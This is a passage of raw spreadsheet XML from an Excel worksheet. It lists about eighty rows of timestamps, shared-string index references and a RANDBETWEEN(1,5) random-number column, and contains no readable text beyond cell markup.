    <row r="26723" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26723" s="1">
        <v>42908.397962962961</v>
      </c>
      <c r="C26723" t="s">
        <v>71</v>
      </c>
      <c r="E26723" s="2" t="s">
        <v>24296</v>
      </c>
      <c r="F26723">
        <f t="shared" ca="1" si="417"/>
        <v>4</v>
      </c>
    </row>
    <row r="26724" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26724" s="1">
        <v>42908.375543981485</v>
      </c>
      <c r="C26724" t="s">
        <v>41</v>
      </c>
      <c r="D26724" t="s">
        <v>312</v>
      </c>
      <c r="E26724" s="2" t="s">
        <v>24297</v>
      </c>
      <c r="F26724">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26725" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26725" s="1">
        <v>42908.331469907411</v>
      </c>
      <c r="C26725" t="s">
        <v>41</v>
      </c>
      <c r="E26725" t="s">
        <v>24298</v>
      </c>
      <c r="F26725">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26726" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26726" s="1">
        <v>42908.286527777775</v>
      </c>
      <c r="C26726" t="s">
        <v>10</v>
      </c>
      <c r="D26726" t="s">
        <v>20</v>
      </c>
      <c r="E26726" t="s">
        <v>24299</v>
      </c>
      <c r="F26726">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26727" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A26727" s="1">
        <v>42908.27920138889</v>
      </c>
      <c r="C26727" t="s">
        <v>41</v>
      </c>
      <c r="E26727" s="2" t="s">
        <v>24300</v>
      </c>
      <c r="F26727">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26728" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26728" s="1">
        <v>42908.26767361111</v>
      </c>
      <c r="C26728" t="s">
        <v>41</v>
      </c>
      <c r="E26728" t="s">
        <v>24301</v>
      </c>
      <c r="F26728">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26729" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26729" s="1">
        <v>42908.25037037037</v>
      </c>
      <c r="C26729" t="s">
        <v>65</v>
      </c>
      <c r="E26729" t="s">
        <v>24302</v>
      </c>
      <c r="F26729">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26730" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26730" s="1">
        <v>42908.239201388889</v>
      </c>
      <c r="C26730" t="s">
        <v>71</v>
      </c>
      <c r="E26730" t="s">
        <v>24303</v>
      </c>
      <c r="F26730">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26731" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26731" s="1">
        <v>42908.235219907408</v>
      </c>
      <c r="C26731" t="s">
        <v>60</v>
      </c>
      <c r="E26731" t="s">
        <v>24304</v>
      </c>
      <c r="F26731">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26732" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26732" s="1">
        <v>42908.2266087963</v>
      </c>
      <c r="C26732" t="s">
        <v>14</v>
      </c>
      <c r="E26732" t="s">
        <v>24305</v>
      </c>
      <c r="F26732">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26733" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26733" s="1">
        <v>42908.210625</v>
      </c>
      <c r="C26733" t="s">
        <v>189</v>
      </c>
      <c r="E26733" t="s">
        <v>24306</v>
      </c>
      <c r="F26733">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26734" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26734" s="1">
        <v>42908.202800925923</v>
      </c>
      <c r="C26734" t="s">
        <v>71</v>
      </c>
      <c r="E26734" s="2" t="s">
        <v>24307</v>
      </c>
      <c r="F26734">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26735" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26735" s="1">
        <v>42908.147453703707</v>
      </c>
      <c r="C26735" t="s">
        <v>410</v>
      </c>
      <c r="E26735" t="s">
        <v>24308</v>
      </c>
      <c r="F26735">
        <f t="shared" ca="1" si="417"/>
        <v>4</v>
      </c>
    </row>
    <row r="26736" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26736" s="1">
        <v>42908.147407407407</v>
      </c>
      <c r="C26736" t="s">
        <v>410</v>
      </c>
      <c r="E26736" t="s">
        <v>24308</v>
      </c>
      <c r="F26736">
        <f t="shared" ca="1" si="417"/>
        <v>4</v>
      </c>
    </row>
    <row r="26737" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26737" s="1">
        <v>42908.120115740741</v>
      </c>
      <c r="C26737" t="s">
        <v>65</v>
      </c>
      <c r="E26737" s="2" t="s">
        <v>24309</v>
      </c>
      <c r="F26737">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26738" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26738" s="1">
        <v>42908.09642361111</v>
      </c>
      <c r="C26738" t="s">
        <v>43</v>
      </c>
      <c r="E26738" s="2" t="s">
        <v>24310</v>
      </c>
      <c r="F26738">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26739" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A26739" s="1">
        <v>42908.076319444444</v>
      </c>
      <c r="C26739" t="s">
        <v>430</v>
      </c>
      <c r="E26739" s="2" t="s">
        <v>24311</v>
      </c>
      <c r="F26739">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26740" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26740" s="1">
        <v>42907.835844907408</v>
      </c>
      <c r="C26740" t="s">
        <v>10</v>
      </c>
      <c r="D26740" t="s">
        <v>36</v>
      </c>
      <c r="E26740" t="s">
        <v>24312</v>
      </c>
      <c r="F26740">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26741" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26741" s="1">
        <v>42907.769988425927</v>
      </c>
      <c r="C26741" t="s">
        <v>97</v>
      </c>
      <c r="E26741" t="s">
        <v>24313</v>
      </c>
      <c r="F26741">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26742" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A26742" s="1">
        <v>42907.719861111109</v>
      </c>
      <c r="C26742" t="s">
        <v>10</v>
      </c>
      <c r="D26742" t="s">
        <v>163</v>
      </c>
      <c r="E26742" s="2" t="s">
        <v>24314</v>
      </c>
      <c r="F26742">
        <f t="shared" ca="1" si="417"/>
        <v>4</v>
      </c>
    </row>
    <row r="26743" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26743" s="1">
        <v>42907.702986111108</v>
      </c>
      <c r="C26743" t="s">
        <v>10</v>
      </c>
      <c r="D26743" t="s">
        <v>89</v>
      </c>
      <c r="E26743" s="2" t="s">
        <v>24315</v>
      </c>
      <c r="F26743">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26744" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A26744" s="1">
        <v>42907.655173611114</v>
      </c>
      <c r="C26744" t="s">
        <v>10</v>
      </c>
      <c r="D26744" t="s">
        <v>23</v>
      </c>
      <c r="E26744" s="2" t="s">
        <v>24316</v>
      </c>
      <c r="F26744">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26745" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26745" s="1">
        <v>42907.610578703701</v>
      </c>
      <c r="C26745" t="s">
        <v>10</v>
      </c>
      <c r="D26745" t="s">
        <v>6</v>
      </c>
      <c r="E26745" t="s">
        <v>24317</v>
      </c>
      <c r="F26745">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26746" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26746" s="1">
        <v>42907.600358796299</v>
      </c>
      <c r="C26746" t="s">
        <v>10</v>
      </c>
      <c r="D26746" t="s">
        <v>17</v>
      </c>
      <c r="E26746" s="2" t="s">
        <v>24318</v>
      </c>
      <c r="F26746">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26747" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26747" s="1">
        <v>42907.581273148149</v>
      </c>
      <c r="C26747" t="s">
        <v>10</v>
      </c>
      <c r="D26747" t="s">
        <v>374</v>
      </c>
      <c r="E26747" t="s">
        <v>24319</v>
      </c>
      <c r="F26747">
        <f t="shared" ca="1" si="417"/>
        <v>5</v>
      </c>
    </row>
    <row r="26748" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26748" s="1">
        <v>42907.567824074074</v>
      </c>
      <c r="C26748" t="s">
        <v>10</v>
      </c>
      <c r="D26748" t="s">
        <v>107</v>
      </c>
      <c r="E26748" s="2" t="s">
        <v>24320</v>
      </c>
      <c r="F26748">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26749" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26749" s="1">
        <v>42907.567719907405</v>
      </c>
      <c r="C26749" t="s">
        <v>10</v>
      </c>
      <c r="D26749" t="s">
        <v>107</v>
      </c>
      <c r="E26749" s="2" t="s">
        <v>24320</v>
      </c>
      <c r="F26749">
        <f t="shared" ca="1" si="417"/>
        <v>3</v>
      </c>
    </row>
    <row r="26750" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26750" s="1">
        <v>42907.567442129628</v>
      </c>
      <c r="C26750" t="s">
        <v>16</v>
      </c>
      <c r="E26750" s="2" t="s">
        <v>24321</v>
      </c>
      <c r="F26750">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26751" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26751" s="1">
        <v>42907.549050925925</v>
      </c>
      <c r="C26751" t="s">
        <v>222</v>
      </c>
      <c r="D26751" t="s">
        <v>312</v>
      </c>
      <c r="E26751" t="s">
        <v>24322</v>
      </c>
      <c r="F26751">
        <f t="shared" ca="1" si="417"/>
        <v>4</v>
      </c>
    </row>
    <row r="26752" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A26752" s="1">
        <v>42907.501284722224</v>
      </c>
      <c r="C26752" t="s">
        <v>65</v>
      </c>
      <c r="E26752" s="2" t="s">
        <v>24323</v>
      </c>
      <c r="F26752">
        <f t="shared" ca="1" si="417"/>
        <v>2</v>
      </c>
    </row>
    <row r="26753" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26753" s="1">
        <v>42907.486168981479</v>
      </c>
      <c r="C26753" t="s">
        <v>10</v>
      </c>
      <c r="D26753" t="s">
        <v>17</v>
      </c>
      <c r="E26753" s="2" t="s">
        <v>24324</v>
      </c>
      <c r="F26753">
        <f t="shared" ca="1" si="417"/>
        <v>1</v>
      </c>
    </row>
    <row r="26754" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26754" s="1">
        <v>42907.477175925924</v>
      </c>
      <c r="C26754" t="s">
        <v>10</v>
      </c>
      <c r="D26754" t="s">
        <v>23</v>
      </c>
      <c r="E26754" t="s">
        <v>24325</v>
      </c>
      <c r="F26754">
        <f t="shared" ref="F26754:F26817" ca="1" si="418">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="26755" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26755" s="1">
        <v>42907.451018518521</v>
      </c>
      <c r="C26755" t="s">
        <v>10</v>
      </c>
      <c r="D26755" t="s">
        <v>52</v>
      </c>
      <c r="E26755" t="s">
        <v>24326</v>
      </c>
      <c r="F26755">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26756" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A26756" s="1">
        <v>42907.444247685184</v>
      </c>
      <c r="C26756" t="s">
        <v>10</v>
      </c>
      <c r="D26756" t="s">
        <v>192</v>
      </c>
      <c r="E26756" s="2" t="s">
        <v>24327</v>
      </c>
      <c r="F26756">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26757" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A26757" s="1">
        <v>42907.443437499998</v>
      </c>
      <c r="C26757" t="s">
        <v>6</v>
      </c>
      <c r="D26757" t="s">
        <v>25</v>
      </c>
      <c r="E26757" s="2" t="s">
        <v>24328</v>
      </c>
      <c r="F26757">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26758" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A26758" s="1">
        <v>42907.437326388892</v>
      </c>
      <c r="C26758" t="s">
        <v>6</v>
      </c>
      <c r="D26758" t="s">
        <v>25</v>
      </c>
      <c r="E26758" s="2" t="s">
        <v>24329</v>
      </c>
      <c r="F26758">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26759" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26759" s="1">
        <v>42907.409895833334</v>
      </c>
      <c r="C26759" t="s">
        <v>314</v>
      </c>
      <c r="E26759" t="s">
        <v>24330</v>
      </c>
      <c r="F26759">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26760" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26760" s="1">
        <v>42907.3984375</v>
      </c>
      <c r="C26760" t="s">
        <v>189</v>
      </c>
      <c r="E26760" t="s">
        <v>24331</v>
      </c>
      <c r="F26760">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26761" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26761" s="1">
        <v>42907.388067129628</v>
      </c>
      <c r="C26761" t="s">
        <v>10</v>
      </c>
      <c r="D26761" t="s">
        <v>52</v>
      </c>
      <c r="E26761" t="s">
        <v>24332</v>
      </c>
      <c r="F26761">
        <f t="shared" ca="1" si="418"/>
        <v>4</v>
      </c>
    </row>
    <row r="26762" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A26762" s="1">
        <v>42907.38721064815</v>
      </c>
      <c r="C26762" t="s">
        <v>6</v>
      </c>
      <c r="D26762" t="s">
        <v>194</v>
      </c>
      <c r="E26762" s="2" t="s">
        <v>24333</v>
      </c>
      <c r="F26762">
        <f t="shared" ca="1" si="418"/>
        <v>1</v>
      </c>
    </row>
    <row r="26763" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26763" s="1">
        <v>42907.376747685186</v>
      </c>
      <c r="C26763" t="s">
        <v>41</v>
      </c>
      <c r="E26763" t="s">
        <v>24334</v>
      </c>
      <c r="F26763">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26764" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26764" s="1">
        <v>42907.338923611111</v>
      </c>
      <c r="C26764" t="s">
        <v>71</v>
      </c>
      <c r="E26764" s="2" t="s">
        <v>24335</v>
      </c>
      <c r="F26764">
        <f t="shared" ca="1" si="418"/>
        <v>4</v>
      </c>
    </row>
    <row r="26765" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26765" s="1">
        <v>42907.298854166664</v>
      </c>
      <c r="C26765" t="s">
        <v>48</v>
      </c>
      <c r="E26765" t="s">
        <v>24336</v>
      </c>
      <c r="F26765">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26766" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A26766" s="1">
        <v>42907.224074074074</v>
      </c>
      <c r="C26766" t="s">
        <v>60</v>
      </c>
      <c r="E26766" s="2" t="s">
        <v>24337</v>
      </c>
      <c r="F26766">
        <f t="shared" ca="1" si="418"/>
        <v>4</v>
      </c>
    </row>
    <row r="26767" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26767" s="1">
        <v>42907.204791666663</v>
      </c>
      <c r="C26767" t="s">
        <v>65</v>
      </c>
      <c r="E26767" s="2" t="s">
        <v>24338</v>
      </c>
      <c r="F26767">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26768" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26768" s="1">
        <v>42907.198576388888</v>
      </c>
      <c r="C26768" t="s">
        <v>71</v>
      </c>
      <c r="E26768" t="s">
        <v>24339</v>
      </c>
      <c r="F26768">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26769" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26769" s="1">
        <v>42907.186180555553</v>
      </c>
      <c r="C26769" t="s">
        <v>124</v>
      </c>
      <c r="E26769" t="s">
        <v>24340</v>
      </c>
      <c r="F26769">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26770" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A26770" s="1">
        <v>42907.177303240744</v>
      </c>
      <c r="C26770" t="s">
        <v>339</v>
      </c>
      <c r="E26770" s="2" t="s">
        <v>24341</v>
      </c>
      <c r="F26770">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26771" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A26771" s="1">
        <v>42907.161215277774</v>
      </c>
      <c r="C26771" t="s">
        <v>318</v>
      </c>
      <c r="E26771" s="2" t="s">
        <v>24342</v>
      </c>
      <c r="F26771">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26772" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26772" s="1">
        <v>42907.160416666666</v>
      </c>
      <c r="C26772" t="s">
        <v>48</v>
      </c>
      <c r="E26772" t="s">
        <v>24343</v>
      </c>
      <c r="F26772">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26773" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26773" s="1">
        <v>42907.148032407407</v>
      </c>
      <c r="C26773" t="s">
        <v>339</v>
      </c>
      <c r="E26773" t="s">
        <v>24344</v>
      </c>
      <c r="F26773">
        <f t="shared" ca="1" si="418"/>
        <v>4</v>
      </c>
    </row>
    <row r="26774" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A26774" s="1">
        <v>42907.138009259259</v>
      </c>
      <c r="C26774" t="s">
        <v>65</v>
      </c>
      <c r="E26774" s="2" t="s">
        <v>24345</v>
      </c>
      <c r="F26774">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26775" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26775" s="1">
        <v>42907.078923611109</v>
      </c>
      <c r="C26775" t="s">
        <v>73</v>
      </c>
      <c r="E26775" t="s">
        <v>24346</v>
      </c>
      <c r="F26775">
        <f t="shared" ca="1" si="418"/>
        <v>1</v>
      </c>
    </row>
    <row r="26776" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26776" s="1">
        <v>42907.078912037039</v>
      </c>
      <c r="C26776" t="s">
        <v>73</v>
      </c>
      <c r="E26776" t="s">
        <v>24346</v>
      </c>
      <c r="F26776">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26777" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26777" s="1">
        <v>42907.015439814815</v>
      </c>
      <c r="C26777" t="s">
        <v>140</v>
      </c>
      <c r="D26777" t="s">
        <v>141</v>
      </c>
      <c r="E26777" t="s">
        <v>24347</v>
      </c>
      <c r="F26777">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26778" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26778" s="1">
        <v>42906.952280092592</v>
      </c>
      <c r="C26778" t="s">
        <v>144</v>
      </c>
      <c r="E26778" t="s">
        <v>24348</v>
      </c>
      <c r="F26778">
        <f t="shared" ca="1" si="418"/>
        <v>1</v>
      </c>
    </row>
    <row r="26779" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26779" s="1">
        <v>42906.906122685185</v>
      </c>
      <c r="C26779" t="s">
        <v>140</v>
      </c>
      <c r="D26779" t="s">
        <v>141</v>
      </c>
      <c r="E26779" t="s">
        <v>24349</v>
      </c>
      <c r="F26779">
        <f t="shared" ca="1" si="418"/>
        <v>1</v>
      </c>
    </row>
    <row r="26780" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26780" s="1">
        <v>42906.834409722222</v>
      </c>
      <c r="C26780" t="s">
        <v>3097</v>
      </c>
      <c r="E26780" t="s">
        <v>24350</v>
      </c>
      <c r="F26780">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26781" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26781" s="1">
        <v>42906.803622685184</v>
      </c>
      <c r="C26781" t="s">
        <v>10</v>
      </c>
      <c r="D26781" t="s">
        <v>6</v>
      </c>
      <c r="E26781" t="s">
        <v>24351</v>
      </c>
      <c r="F26781">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26782" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26782" s="1">
        <v>42906.788680555554</v>
      </c>
      <c r="C26782" t="s">
        <v>17</v>
      </c>
      <c r="E26782" t="s">
        <v>24352</v>
      </c>
      <c r="F26782">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26783" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26783" s="1">
        <v>42906.74800925926</v>
      </c>
      <c r="C26783" t="s">
        <v>10</v>
      </c>
      <c r="D26783" t="s">
        <v>23</v>
      </c>
      <c r="E26783" t="s">
        <v>24353</v>
      </c>
      <c r="F26783">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26784" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A26784" s="1">
        <v>42906.671747685185</v>
      </c>
      <c r="C26784" t="s">
        <v>10</v>
      </c>
      <c r="D26784" t="s">
        <v>112</v>
      </c>
      <c r="E26784" s="2" t="s">
        <v>24354</v>
      </c>
      <c r="F26784">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26785" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26785" s="1">
        <v>42906.653715277775</v>
      </c>
      <c r="C26785" t="s">
        <v>10</v>
      </c>
      <c r="D26785" t="s">
        <v>271</v>
      </c>
      <c r="E26785" t="s">
        <v>24355</v>
      </c>
      <c r="F26785">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26786" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A26786" s="1">
        <v>42906.653101851851</v>
      </c>
      <c r="C26786" t="s">
        <v>10</v>
      </c>
      <c r="D26786" t="s">
        <v>46</v>
      </c>
      <c r="E26786" s="2" t="s">
        <v>24356</v>
      </c>
      <c r="F26786">
        <f t="shared" ca="1" si="418"/>
        <v>4</v>
      </c>
    </row>
    <row r="26787" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A26787" s="1">
        <v>42906.637152777781</v>
      </c>
      <c r="C26787" t="s">
        <v>10</v>
      </c>
      <c r="D26787" t="s">
        <v>6</v>
      </c>
      <c r="E26787" s="2" t="s">
        <v>24357</v>
      </c>
      <c r="F26787">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26788" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A26788" s="1">
        <v>42906.628634259258</v>
      </c>
      <c r="C26788" t="s">
        <v>6</v>
      </c>
      <c r="D26788" t="s">
        <v>25</v>
      </c>
      <c r="E26788" s="2" t="s">
        <v>24358</v>
      </c>
      <c r="F26788">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26789" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A26789" s="1">
        <v>42906.618831018517</v>
      </c>
      <c r="C26789" t="s">
        <v>260</v>
      </c>
      <c r="E26789" s="2" t="s">
        <v>24359</v>
      </c>
      <c r="F26789">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26790" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26790" s="1">
        <v>42906.617245370369</v>
      </c>
      <c r="C26790" t="s">
        <v>10</v>
      </c>
      <c r="D26790" t="s">
        <v>192</v>
      </c>
      <c r="E26790" t="s">
        <v>24360</v>
      </c>
      <c r="F26790">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26791" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26791" s="1">
        <v>42906.614120370374</v>
      </c>
      <c r="C26791" t="s">
        <v>41</v>
      </c>
      <c r="E26791" t="s">
        <v>24361</v>
      </c>
      <c r="F26791">
        <f t="shared" ca="1" si="418"/>
        <v>4</v>
      </c>
    </row>
    <row r="26792" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26792" s="1">
        <v>42906.606377314813</v>
      </c>
      <c r="C26792" t="s">
        <v>10</v>
      </c>
      <c r="D26792" t="s">
        <v>17</v>
      </c>
      <c r="E26792" t="s">
        <v>24362</v>
      </c>
      <c r="F26792">
        <f t="shared" ca="1" si="418"/>
        <v>1</v>
      </c>
    </row>
    <row r="26793" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A26793" s="1">
        <v>42906.604942129627</v>
      </c>
      <c r="C26793" t="s">
        <v>10</v>
      </c>
      <c r="D26793" t="s">
        <v>56</v>
      </c>
      <c r="E26793" s="2" t="s">
        <v>24363</v>
      </c>
      <c r="F26793">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26794" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26794" s="1">
        <v>42906.594178240739</v>
      </c>
      <c r="C26794" t="s">
        <v>10</v>
      </c>
      <c r="D26794" t="s">
        <v>41</v>
      </c>
      <c r="E26794" t="s">
        <v>24364</v>
      </c>
      <c r="F26794">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26795" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26795" s="1">
        <v>42906.578912037039</v>
      </c>
      <c r="C26795" t="s">
        <v>10</v>
      </c>
      <c r="D26795" t="s">
        <v>89</v>
      </c>
      <c r="E26795" t="s">
        <v>24365</v>
      </c>
      <c r="F26795">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26796" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26796" s="1">
        <v>42906.559814814813</v>
      </c>
      <c r="C26796" t="s">
        <v>41</v>
      </c>
      <c r="E26796" t="s">
        <v>24366</v>
      </c>
      <c r="F26796">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26797" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26797" s="1">
        <v>42906.516851851855</v>
      </c>
      <c r="C26797" t="s">
        <v>41</v>
      </c>
      <c r="E26797" t="s">
        <v>1446</v>
      </c>
      <c r="F26797">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26798" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26798" s="1">
        <v>42906.491863425923</v>
      </c>
      <c r="C26798" t="s">
        <v>1341</v>
      </c>
      <c r="E26798" t="s">
        <v>24367</v>
      </c>
      <c r="F26798">
        <f t="shared" ca="1" si="418"/>
        <v>2</v>
      </c>
    </row>
    <row r="26799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26799" s="1">
        <v>42906.484027777777</v>
      </c>
      <c r="C26799" t="s">
        <v>41</v>
      </c>
      <c r="E26799" t="s">
        <v>24368</v>
      </c>
      <c r="F26799">
        <f t="shared" ca="1" si="418"/>
        <v>4</v>
      </c>
    </row>
    <row r="26800" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26800" s="1">
        <v>42906.476388888892</v>
      </c>
      <c r="C26800" t="s">
        <v>60</v>
      </c>
      <c r="E26800" t="s">
        <v>24369</v>
      </c>
      <c r="F26800">
        <f t="shared" ca="1" si="418"/>
        <v>3</v>
      </c>
    </row>
    <row r="26801" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26801" s="1">
        <v>42906.475162037037</v>
      </c>
      <c r="C26801" t="s">
        <v>290</v>
      </c>
      <c r="E26801" t="s">
        <v>24370</v>
      </c>
      <c r="F26801">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
    <row r="26802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A26802" s="1">
        <v>42906.470601851855</v>
      </c>
      <c r="C26802" t="s">
        <v>10</v>
      </c>
      <c r="D26802" t="s">
        <v>56</v>
      </c>
      <c r="E26802" t="s">
        <v>24371</v>
      </c>
      <c r="F26802">
        <f t="shared" ca="1" si="418"/>
        <v>5</v>
      </c>
    </row>
